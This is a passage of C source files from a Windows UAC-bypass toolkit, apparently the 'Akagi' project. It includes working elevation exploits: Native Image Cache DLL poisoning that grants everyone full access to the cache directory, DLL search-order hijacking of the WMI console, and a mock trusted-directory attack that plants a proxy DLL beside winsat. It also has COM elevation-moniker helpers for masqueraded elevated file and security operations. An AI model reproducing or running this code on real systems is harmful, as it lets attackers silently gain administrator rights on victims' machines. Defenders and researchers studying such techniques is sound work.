auxSize;\n if (ModuleGuid) *ModuleGuid = mvid;\n\n ntStatus = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (lpAssemblyFilePath)\n supHeapFree(lpAssemblyFilePath);\n\n if (lpAssemblyName)\n supHeapFree(lpAssemblyName);\n if (lpDisplayName)\n supHeapFree(lpDisplayName);\n if (lpDisplayNameANSI)\n supHeapFree(lpDisplayNameANSI);\n\n if (asmName) {\n asmName->lpVtbl->Finalize(asmName);\n asmName->lpVtbl->Release(asmName);\n }\n\n if (asmCache)\n asmCache->lpVtbl->Release(asmCache);\n\n if (asmEnum)\n asmEnum->lpVtbl->Release(asmEnum);\n\n if (!NT_SUCCESS(ntStatus) && auxPtr)\n supHeapFree(auxPtr);\n\n return ntStatus;\n}\n\n/*\n* ucmNICPoisonMethod2\n*\n* Purpose:\n*\n* Bypass UAC by by Dll hijack of Native Image Cache.\n*\n*/\nNTSTATUS ucmNICPoisonMethod2(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;\n WCHAR szFileName[MAX_PATH * 2];\n WCHAR szTargetDir[MAX_PATH * 2];\n WCHAR szCacheDir[MAX_PATH * 2];\n WCHAR szMVID[64];\n\n LPWSTR oldSecurity = NULL;\n SIZE_T dirLen;\n GUID targetMVID;\n\n PVOID auxData = NULL;\n SIZE_T auxDataSize;\n\n BOOL bNeedSecurityReset = FALSE, bNeedRestore = FALSE;\n BOOL IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);\n\n do {\n\n //\n // Build cache path.\n //\n _strcpy(szCacheDir, g_ctx->szSystemRoot);\n _strcat(szCacheDir, TEXT(\"assembly\\\\NativeImages_\"));\n\n if (IsWin7)\n _strcat(szCacheDir, NET2_DIR);\n else\n _strcat(szCacheDir, NET4_DIR);\n\n#ifdef _WIN64\n _strcat(szCacheDir, TEXT(\"_64\"));\n#else\n _strcat(szCacheDir, TEXT(\"_32\"));\n#endif\n ntStatus = ucmxGenerateAUX(ASSEMBLY_MMCEX, &auxData, &auxDataSize, NULL);\n if (!NT_SUCCESS(ntStatus)) {\n MethodResult = ntStatus;\n break;\n }\n\n RtlSecureZeroMemory(&szMVID, sizeof(szMVID));\n RtlSecureZeroMemory(&targetMVID, sizeof(targetMVID));\n if (!fusUtilGetAssemblyMVIDFromZapCache(ASSEMBLY_MMCEX, &targetMVID))\n break;\n\n fusUtilBinToUnicodeHex((PBYTE)&targetMVID, sizeof(GUID), szMVID);\n\n //\n // Remember old directory security permissions.\n //\n if (!ucmMasqueradedGetObjectSecurityCOM(szCacheDir,\n DACL_SECURITY_INFORMATION,\n SE_FILE_OBJECT,\n &oldSecurity))\n {\n break;\n }\n\n //\n // Reset target file permissions.\n //\n if (!ucmMasqueradedSetObjectSecurityCOM(szCacheDir,\n DACL_SECURITY_INFORMATION,\n SE_FILE_OBJECT,\n T_SDDL_EVERYONE_FULL_ACCESS))\n {\n break;\n }\n\n bNeedSecurityReset = TRUE;\n\n //\n // Move MMCEx to MMCEx.$\n //\n _strcpy(szFileName, szCacheDir);\n _strcat(szFileName, MMCEX_DIR);\n\n _strcpy(szTargetDir, szFileName);\n _strcat(szTargetDir, TEXT(\".$\"));\n\n if (!MoveFileEx(szFileName,\n szTargetDir,\n MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))\n {\n break;\n }\n\n bNeedRestore = TRUE;\n\n //\n // 1. MMCEx\n // 2. MMCEx\\\\\n // 3. MMCEx\\\\MMCEx.ni.dll\n // 4. MMCEx\\\\MMCEx.ni.aux\n //\n // 1. MMCEx\n //\n if (!CreateDirectory(szFileName, NULL))\n if (GetLastError() != ERROR_ALREADY_EXISTS) {\n break;\n }\n\n //\n // 2. Subdirectory \n //\n supPathAddBackSlash(szFileName);\n _strcat(szFileName, szMVID);\n if (!CreateDirectory(szFileName, NULL))\n if (GetLastError() != ERROR_ALREADY_EXISTS) {\n break;\n }\n\n //\n // 3. Drop payload.\n //\n supPathAddBackSlash(szFileName);\n dirLen = _strlen(szFileName);\n _strcat(szFileName, MMCEX_NI_DLL);\n if (!supWriteBufferToFile(szFileName, ProxyDll, ProxyDllSize)) {\n break;\n }\n\n //\n // 4. Drop aux payload.\n //\n szFileName[dirLen] = 0;\n _strcat(szFileName, MMCEX_NI_DLL_AUX);\n if (!supWriteBufferToFile(szFileName, auxData, (ULONG)auxDataSize)) {\n break;\n }\n\n //\n // Run target.\n //\n _strcpy(szFileName, g_ctx->szSystemDirectory);\n _strcat(szFileName, MMC_EXE);\n\n if (supRunProcess2(szFileName,\n WF_MSC,\n NULL,\n SW_SHOW,\n SUPRUNPROCESS_TIMEOUT_DEFAULT))\n {\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n\n if (bNeedRestore) {\n\n //\n // Remove fake directory.\n //\n _strcpy(szFileName, szCacheDir);\n _strcat(szFileName, MMCEX_DIR);\n supRemoveDirectoryRecursive(szFileName);\n\n //\n // Restore original MMCEx directory.\n //\n _strcat(szFileName, TEXT(\".$\"));\n _strcpy(szTargetDir, szCacheDir);\n _strcat(szTargetDir, MMCEX_DIR);\n MoveFileEx(szFileName,\n szTargetDir,\n MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);\n\n }\n\n //\n // Revert directory security.\n //\n if (oldSecurity) {\n\n if (bNeedSecurityReset) {\n ucmMasqueradedSetObjectSecurityCOM(szCacheDir,\n DACL_SECURITY_INFORMATION,\n SE_FILE_OBJECT,\n oldSecurity);\n }\n\n CoTaskMemFree(oldSecurity);\n }\n\n if (auxData)\n supHeapFree(auxData);\n\n if (!NT_SUCCESS(MethodResult))\n supSetGlobalCompletionEvent();\n\n return MethodResult;\n}\n\n/*\n* ucmAtlHijackMethod\n*\n* Purpose:\n*\n* Bypass UAC by abusing search order of WMI management console dependency dll.\n*\n*/\nNTSTATUS ucmAtlHijackMethod(\n _In_opt_ LPCWSTR lpTargetApp,\n _In_ LPCWSTR lpTargetDll,\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n return ucmGenericAutoelevationEx(lpTargetApp,\n lpTargetDll,\n WMIMGMT_MSC,\n WBEM_DIR,\n ProxyDll,\n ProxyDllSize);\n}\n"
},
{
"path": "Source/Akagi/methods/comsup.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2021\n*\n* TITLE: COMSUP.C\n*\n* VERSION: 3.57\n*\n* DATE: 01 Nov 2021\n*\n* COM interfaces based routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmAllocateElevatedObject\n*\n* Purpose:\n*\n* CoGetObject elevation as admin.\n*\n*/\nHRESULT ucmAllocateElevatedObject(\n _In_ LPCWSTR lpObjectCLSID,\n _In_ REFIID riid,\n _In_ DWORD dwClassContext,\n _Outptr_ void **ppv\n)\n{\n DWORD classContext;\n HRESULT hr = E_FAIL;\n PVOID ElevatedObject = NULL;\n\n /*\n CLSID xCLSID;\n IUnknown *IBase;\n */\n\n BIND_OPTS3 bop;\n WCHAR szMoniker[MAX_PATH];\n\n do {\n\n if (_strlen(lpObjectCLSID) > 64)\n break;\n\n /*\n if (NOERROR == CLSIDFromString(\n lpObjectCLSID,\n &xCLSID))\n {\n hr = CoCreateInstance(\n &xCLSID,\n NULL,\n CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,\n riid,\n &IBase);\n\n if (hr == S_OK) {\n IBase->lpVtbl->Release(IBase);\n }\n }\n */\n\n RtlSecureZeroMemory(&bop, sizeof(bop));\n bop.cbStruct = sizeof(bop);\n\n classContext = dwClassContext;\n if (dwClassContext == 0)\n classContext = CLSCTX_LOCAL_SERVER;\n\n bop.dwClassContext = classContext;\n\n _strcpy(szMoniker, T_ELEVATION_MONIKER_ADMIN);\n _strcat(szMoniker, lpObjectCLSID);\n\n hr = CoGetObject(szMoniker, (BIND_OPTS *)&bop, riid, &ElevatedObject);\n\n } while (FALSE);\n\n *ppv = ElevatedObject;\n\n return hr;\n}\n\n/*\n* ucmxFileOpCreateAndRelease\n*\n* Purpose:\n*\n* Test create new instance IFileOperation.\n*\n*/\nVOID ucmxFileOpCreateAndRelease(VOID)\n{\n IFileOperation *FileOperation = NULL;\n\n if (S_OK != CoCreateInstance(\n &CLSID_FileOperation,\n NULL,\n CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,\n &IID_IFileOperation,\n &FileOperation))\n {\n return;\n }\n\n if (FileOperation != NULL) {\n FileOperation->lpVtbl->Release(FileOperation);\n }\n}\n\n/*\n* ucmMasqueradedRenameElementCOM\n*\n* Purpose:\n*\n* Rename file/directory autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedRenameElementCOM(\n _In_ LPCWSTR OldName,\n _In_ LPCWSTR NewName\n)\n{\n BOOL bResult = FALSE;\n IFileOperation *FileOperation = NULL;\n IShellItem *psiDestDir = NULL;\n HRESULT hr_init;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n //ucmxFileOpCreateAndRelease();\n\n if (S_OK != ucmAllocateElevatedObject(\n T_CLSID_FileOperation,\n &IID_IFileOperation,\n CLSCTX_LOCAL_SERVER,\n &FileOperation))\n {\n break;\n }\n\n if (FileOperation == NULL) {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n FileOperation,\n g_ctx->IFileOperationFlags))\n {\n break;\n }\n\n if (S_OK != SHCreateItemFromParsingName(\n OldName,\n NULL,\n &IID_IShellItem,\n &psiDestDir))\n {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->RenameItem(\n FileOperation,\n psiDestDir,\n NewName,\n NULL))\n {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->PerformOperations(\n FileOperation))\n {\n break;\n }\n\n psiDestDir->lpVtbl->Release(psiDestDir);\n psiDestDir = NULL;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (FileOperation != NULL) {\n FileOperation->lpVtbl->Release(FileOperation);\n }\n\n if (psiDestDir != NULL) {\n psiDestDir->lpVtbl->Release(psiDestDir);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return bResult;\n}\n\n/*\n* ucmMasqueradedCreateSubDirectoryCOM\n*\n* Purpose:\n*\n* Create directory autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedCreateSubDirectoryCOM(\n _In_ LPCWSTR ParentDirectory,\n _In_ LPCWSTR SubDirectory\n)\n{\n BOOL bResult = FALSE;\n IFileOperation *FileOperation = NULL;\n IShellItem *psiDestDir = NULL;\n HRESULT hr_init;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n //ucmxFileOpCreateAndRelease();\n\n if (S_OK != ucmAllocateElevatedObject(\n T_CLSID_FileOperation,\n &IID_IFileOperation,\n CLSCTX_LOCAL_SERVER,\n &FileOperation))\n {\n break;\n }\n\n if (FileOperation == NULL) {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n FileOperation,\n g_ctx->IFileOperationFlags))\n {\n break;\n }\n\n if (S_OK != SHCreateItemFromParsingName(\n ParentDirectory,\n NULL,\n &IID_IShellItem,\n &psiDestDir))\n {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->NewItem(\n FileOperation,\n psiDestDir,\n FILE_ATTRIBUTE_DIRECTORY,\n SubDirectory,\n NULL,\n NULL))\n {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->PerformOperations(\n FileOperation))\n {\n break;\n }\n\n psiDestDir->lpVtbl->Release(psiDestDir);\n psiDestDir = NULL;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (FileOperation != NULL) {\n FileOperation->lpVtbl->Release(FileOperation);\n }\n\n if (psiDestDir != NULL) {\n psiDestDir->lpVtbl->Release(psiDestDir);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return bResult;\n}\n\n/*\n* ucmMasqueradedMoveCopyFileCOM\n*\n* Purpose:\n*\n* Move or Copy file autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedMoveCopyFileCOM(\n _In_ LPCWSTR SourceFileName,\n _In_ LPCWSTR DestinationDir,\n _In_ BOOL fMove\n)\n{\n BOOL bResult = FALSE;\n IFileOperation *FileOperation = NULL;\n IShellItem *isrc = NULL, *idst = NULL;\n HRESULT r = E_FAIL, hr_init;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n //ucmxFileOpCreateAndRelease();\n\n if (S_OK != ucmAllocateElevatedObject(\n T_CLSID_FileOperation,\n &IID_IFileOperation,\n CLSCTX_LOCAL_SERVER,\n &FileOperation))\n {\n break;\n }\n\n if (FileOperation == NULL) {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n FileOperation,\n g_ctx->IFileOperationFlags))\n {\n break;\n }\n\n if (S_OK != SHCreateItemFromParsingName(\n SourceFileName,\n NULL,\n &IID_IShellItem,\n &isrc))\n {\n break;\n }\n\n if (S_OK != SHCreateItemFromParsingName(\n DestinationDir,\n NULL,\n &IID_IShellItem,\n &idst))\n {\n break;\n }\n\n if (fMove) {\n r = FileOperation->lpVtbl->MoveItem(\n FileOperation,\n isrc,\n idst,\n NULL,\n NULL);\n }\n else {\n r = FileOperation->lpVtbl->CopyItem(\n FileOperation,\n isrc,\n idst,\n NULL,\n NULL);\n }\n\n if (r != S_OK)\n break;\n\n if (S_OK != FileOperation->lpVtbl->PerformOperations(\n FileOperation))\n {\n break;\n }\n\n idst->lpVtbl->Release(idst);\n idst = NULL;\n isrc->lpVtbl->Release(isrc);\n isrc = NULL;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (FileOperation != NULL)\n FileOperation->lpVtbl->Release(FileOperation);\n\n if (isrc != NULL)\n isrc->lpVtbl->Release(isrc);\n\n if (idst != NULL)\n idst->lpVtbl->Release(idst);\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return bResult;\n}\n\n/*\n* ucmMasqueradedDeleteDirectoryFileCOM\n*\n* Purpose:\n*\n* Delete directory or file autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedDeleteDirectoryFileCOM(\n _In_ LPCWSTR FileName\n)\n{\n BOOL bResult = FALSE;\n IFileOperation *FileOperation = NULL;\n IShellItem *isrc = NULL;\n HRESULT r = E_FAIL, hr_init;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n //ucmxFileOpCreateAndRelease();\n\n if (S_OK != ucmAllocateElevatedObject(\n T_CLSID_FileOperation,\n &IID_IFileOperation,\n CLSCTX_LOCAL_SERVER,\n &FileOperation))\n {\n break;\n }\n\n if (FileOperation == NULL) {\n break;\n }\n\n if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n FileOperation,\n g_ctx->IFileOperationFlags))\n {\n break;\n }\n\n if (S_OK != SHCreateItemFromParsingName(\n FileName,\n NULL,\n &IID_IShellItem,\n &isrc))\n {\n break;\n }\n\n r = FileOperation->lpVtbl->DeleteItem(\n FileOperation,\n isrc,\n NULL);\n\n if (r != S_OK)\n break;\n\n if (S_OK != FileOperation->lpVtbl->PerformOperations(\n FileOperation))\n {\n break;\n }\n\n isrc->lpVtbl->Release(isrc);\n isrc = NULL;\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (FileOperation != NULL)\n FileOperation->lpVtbl->Release(FileOperation);\n\n if (isrc != NULL)\n isrc->lpVtbl->Release(isrc);\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n#ifdef _DEBUG\n if (bResult) {\n OutputDebugString(FileName);\n OutputDebugString(TEXT(\"\\r\\nCleanup success\\r\\n\"));\n }\n else {\n OutputDebugString(TEXT(\"\\r\\nCleanup failed\\r\\n\"));\n }\n#endif\n\n return bResult;\n}\n\n/*\n* ucmMasqueradedMoveFileCOM\n*\n* Purpose:\n*\n* Move file autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedMoveFileCOM(\n _In_ LPCWSTR SourceFileName,\n _In_ LPCWSTR DestinationDir\n)\n{\n return ucmMasqueradedMoveCopyFileCOM(\n SourceFileName,\n DestinationDir,\n TRUE);\n}\n\n/*\n* ucmMasqueradedGetObjectSecurityCOM\n*\n* Purpose:\n*\n* Get object security through ISecurityEditor(GetNamedInfo).\n* This function expects that supMasqueradeProcess was called on process initialization.\n* \n* Note:\n* Use CoTaskMemFree to release Sddl allocated memory as SecurityEditor->GetSecurity uses SHStrDupW to store result SSDL.\n*\n*/\nBOOL ucmMasqueradedGetObjectSecurityCOM(\n _In_ LPCWSTR lpTargetObject,\n _In_ SECURITY_INFORMATION SecurityInformation,\n _In_ SE_OBJECT_TYPE ObjectType,\n _Inout_ LPOLESTR *Sddl\n)\n{\n HRESULT r = E_FAIL, hr_init;\n ISecurityEditor* SecurityEditor = NULL;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n r = ucmAllocateElevatedObject(\n T_CLSID_ShellSecurityEditor,\n &IID_ISecurityEditor,\n CLSCTX_LOCAL_SERVER,\n &SecurityEditor);\n\n if (r != S_OK)\n break;\n\n if (SecurityEditor == NULL) {\n r = E_OUTOFMEMORY;\n break;\n }\n\n r = SecurityEditor->lpVtbl->GetSecurity(\n SecurityEditor,\n lpTargetObject,\n ObjectType,\n SecurityInformation,\n Sddl);\n\n } while (FALSE);\n\n if (SecurityEditor != NULL) {\n SecurityEditor->lpVtbl->Release(SecurityEditor);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return SUCCEEDED(r);\n}\n\n/*\n* ucmMasqueradedSetObjectSecurityCOM\n*\n* Purpose:\n*\n* Change object security through ISecurityEditor(SetNamedInfo).\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedSetObjectSecurityCOM(\n _In_ LPCWSTR lpTargetObject,\n _In_ SECURITY_INFORMATION SecurityInformation,\n _In_ SE_OBJECT_TYPE ObjectType,\n _In_ LPCWSTR NewSddl\n)\n{\n HRESULT r = E_FAIL, hr_init;\n ISecurityEditor* SecurityEditor = NULL;\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n r = ucmAllocateElevatedObject(\n T_CLSID_ShellSecurityEditor,\n &IID_ISecurityEditor,\n CLSCTX_LOCAL_SERVER,\n &SecurityEditor);\n\n if (r != S_OK)\n break;\n\n if (SecurityEditor == NULL) {\n r = E_OUTOFMEMORY;\n break;\n }\n\n r = SecurityEditor->lpVtbl->SetSecurity(\n SecurityEditor,\n lpTargetObject,\n ObjectType,\n SecurityInformation,\n NewSddl);\n\n } while (FALSE);\n\n if (SecurityEditor != NULL) {\n SecurityEditor->lpVtbl->Release(SecurityEditor);\n }\n\n if (hr_init == S_OK)\n CoUninitialize();\n\n return SUCCEEDED(r);\n}\n"
},
{
"path": "Source/Akagi/methods/comsup.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n* TITLE: COMSUP.H\n*\n* VERSION: 3.63\n*\n* DATE: 16 Jul 2022\n*\n* Prototypes and definitions for COM interfaces and routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define HRESULT_BREAK_ON_FAILED(hr) { if (FAILED(hr)) break; }\n#define HRESULT_RETURN_ON_FAILED(hr) { if (FAILED(hr)) return; }\n#define HRESULT_RETURN_VALUE_ON_FAILED(hr, value) { if (FAILED(hr)) return value; } \n\n#ifndef UCM_DEFINE_GUID\n#define UCM_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \\\n EXTERN_C const GUID DECLSPEC_SELECTANY name \\\n = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } } \n#endif\n\nUCM_DEFINE_GUID(IID_IColorDataProxy, 0x0A16D195, 0x6F47, 0x4964, 0x92, 0x87, 0x9F, 0x4B, 0xAB, 0x6D, 0x98, 0x27);\nUCM_DEFINE_GUID(IID_ICMLuaUtil, 0x6EDD6D74, 0xC007, 0x4E75, 0xB7, 0x6A, 0xE5, 0x74, 0x09, 0x95, 0xE2, 0x4C);\nUCM_DEFINE_GUID(IID_IFwCplLua, 0x56DA8B35, 0x7FC3, 0x45DF, 0x87, 0x68, 0x66, 0x41, 0x47, 0x86, 0x45, 0x73);\nUCM_DEFINE_GUID(IID_ISecurityEditor, 0x14B2C619, 0xD07A, 0x46EF, 0x8B, 0x62, 0x31, 0xB6, 0x4F, 0x3B, 0x84, 0x5C);\nUCM_DEFINE_GUID(IID_EditionUpgradeManager, 0xF2DCB80D, 0x0670, 0x44BC, 0x90, 0x02, 0xCD, 0x18, 0x68, 0x87, 0x30, 0xAF);\nUCM_DEFINE_GUID(IID_IEAxiAdminInstaller, 0x9AEA8A59, 0xE0C9, 0x40F1, 0x87, 0xDD, 0x75, 0x70, 0x61, 0xD5, 0x61, 0x77);\nUCM_DEFINE_GUID(IID_IEAxiInstaller2, 0xBC0EC710, 0xA3ED, 0x4F99, 0xB1, 0x4F, 0x5F, 0xD5, 0x9F, 0xDA, 0xCE, 0xA3);\nUCM_DEFINE_GUID(IID_WscAdmin, 0x49ACAA99, 0xF009, 0x4524, 0x9D, 0x2A, 0xD7, 0x51, 0xC9, 0xA3, 0x8F, 0x60);\nUCM_DEFINE_GUID(IID_ElevatedFactoryServer, 0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57, 0x61, 0x0B, 0x08);\n\nHRESULT ucmAllocateElevatedObject(\n _In_ LPCWSTR lpObjectCLSID,\n _In_ REFIID riid,\n _In_ DWORD dwClassContext,\n _Outptr_ void **ppv);\n\nBOOL ucmMasqueradedCreateSubDirectoryCOM(\n _In_ LPCWSTR ParentDirectory,\n _In_ LPCWSTR SubDirectory);\n\nBOOL ucmMasqueradedMoveCopyFileCOM(\n _In_ LPCWSTR SourceFileName,\n _In_ LPCWSTR DestinationDir,\n _In_ BOOL fMove);\n\nBOOL ucmMasqueradedMoveFileCOM(\n _In_ LPCWSTR SourceFileName,\n _In_ LPCWSTR DestinationDir);\n\nBOOL ucmMasqueradedDeleteDirectoryFileCOM(\n _In_ LPCWSTR FileName);\n\nBOOL ucmMasqueradedRenameElementCOM(\n _In_ LPCWSTR OldName,\n _In_ LPCWSTR NewName);\n\nBOOL ucmMasqueradedGetObjectSecurityCOM(\n _In_ LPCWSTR lpTargetObject,\n _In_ SECURITY_INFORMATION SecurityInformation,\n _In_ SE_OBJECT_TYPE ObjectType,\n _Inout_ LPOLESTR *Sddl);\n\nBOOL ucmMasqueradedSetObjectSecurityCOM(\n _In_ LPCWSTR lpTargetObject,\n _In_ SECURITY_INFORMATION SecurityInformation,\n _In_ SE_OBJECT_TYPE ObjectType,\n _In_ LPCWSTR NewSddl);\n"
},
{
"path": "Source/Akagi/methods/dwells.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2020\n*\n* TITLE: DWELLS.C\n*\n* VERSION: 3.50\n*\n* DATE: 14 Sep 2020\n*\n* David Wells based method.\n*\n* Original method URL:\n* https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmDirectoryMockMethod\n*\n* Purpose:\n*\n* UAC bypass abusing GetLongPathNameW behavior during AIS.\n*\n*/\nNTSTATUS ucmDirectoryMockMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HANDLE hFakeWindows = NULL;\n UNICODE_STRING usDirectoryName;\n OBJECT_ATTRIBUTES ObjectAttributes;\n\n WCHAR szPayloadDir[MAX_PATH * 2];\n WCHAR szSource[MAX_PATH * 2];\n WCHAR szDest[MAX_PATH * 2];\n\n do {\n\n //\n // Create destination dir \"system32\" in %temp%\n //\n _strcpy(szPayloadDir, g_ctx->szTempDirectory);\n _strcat(szPayloadDir, L\"system32\\\\\");\n if (!CreateDirectory(szPayloadDir, NULL)) {\n if (GetLastError() != ERROR_ALREADY_EXISTS)\n break;\n }\n\n //\n // Drop fubuki to %temp%\\system32 as winmm.dll\n //\n _strcpy(szDest, szPayloadDir);\n _strcat(szDest, WINMM_DLL);\n if (!supWriteBufferToFile(szDest, ProxyDll, ProxyDllSize))\n break;\n\n //\n // Copy winsat to %temp%\\system32\n //\n _strcpy(szSource, g_ctx->szSystemDirectory);\n _strcat(szSource, WINSAT_EXE);\n\n _strcpy(szDest, szPayloadDir);\n _strcat(szDest, WINSAT_EXE);\n if (!CopyFile(szSource, szDest, FALSE))\n break;\n\n //\n // Fake root.\n //\n RtlSecureZeroMemory(szSource, sizeof(szSource));\n szSource[0] = L'\\\\';\n szSource[1] = L'?';\n szSource[2] = L'?';\n szSource[3] = L'\\\\';\n _strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4);\n _strcat(szSource, L\"Windows \");\n\n RtlInitUnicodeString(&usDirectoryName, szSource);\n InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName,\n OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n if (!NT_SUCCESS(supCreateDirectory(\n &hFakeWindows,\n &ObjectAttributes,\n FILE_SHARE_READ | FILE_SHARE_WRITE,\n FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN)))\n {\n break;\n }\n\n //\n // Set reparse to %temp%.\n //\n _strcpy(szSource, L\"\\\\??\\\\\");\n _strcat(szSource, g_ctx->szTempDirectory);\n supSetMountPoint(\n hFakeWindows,\n szSource,\n &szSource[4]);\n\n //\n // Run target application.\n //\n RtlSecureZeroMemory(&szSource, sizeof(szSource));\n _strncpy(szSource, 4, g_ctx->szSystemRoot, 4);\n _strcat(szSource, L\"Windows \\\\system32\\\\\");\n _strcat(szSource, WINSAT_EXE);\n if (supRunProcess(szSource, NULL))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (hFakeWindows) {\n //\n // Remove reparse point.\n //\n supDeleteMountPoint(hFakeWindows);\n NtClose(hFakeWindows);\n\n //\n // Remove directory.\n //\n RtlSecureZeroMemory(szSource, sizeof(szSource));\n szSource[0] = L'\\\\';\n szSource[1] = L'?';\n szSource[2] = L'?';\n szSource[3] = L'\\\\';\n _strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4);\n _strcat(szSource, L\"Windows \");\n\n RtlInitUnicodeString(&usDirectoryName, szSource);\n InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName,\n OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n NtDeleteFile(&ObjectAttributes);\n }\n return MethodResult;\n}\n"
},
{
"path": "Source/Akagi/methods/elvint.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2022\n*\n* TITLE: ELVINT.H\n*\n* VERSION: 3.62\n*\n* DATE: 04 Jul 2022\n*\n* Prototypes and definitions for elevated interface methods.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n \ntypedef interface IColorDataProxy IColorDataProxy;\ntypedef interface ICMLuaUtil ICMLuaUtil;\ntypedef interface IFwCplLua IFwCplLua;\ntypedef interface IEditionUpgradeManager IEditionUpgradeManager;\ntypedef interface ISecurityEditor ISecurityEditor;\ntypedef interface IIEAdminBrokerObject IIEAdminBrokerObject;\ntypedef interface IActiveXInstallBroker IActiveXInstallBroker;\ntypedef interface IWscAdmin IWscAdmin;\ntypedef interface IElevatedFactoryServer IElevatedFactoryServer;\n\n//VTBL DEF\n\ntypedef struct IColorDataProxyVtbl {\n\n BEGIN_INTERFACE\n\n HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n __RPC__in IColorDataProxy * This,\n __RPC__in REFIID riid,\n _COM_Outptr_ void **ppvObject);\n\n ULONG(STDMETHODCALLTYPE *AddRef)(\n __RPC__in IColorDataProxy * This);\n\n ULONG(STDMETHODCALLTYPE *Release)(\n __RPC__in IColorDataProxy * This);\n\n 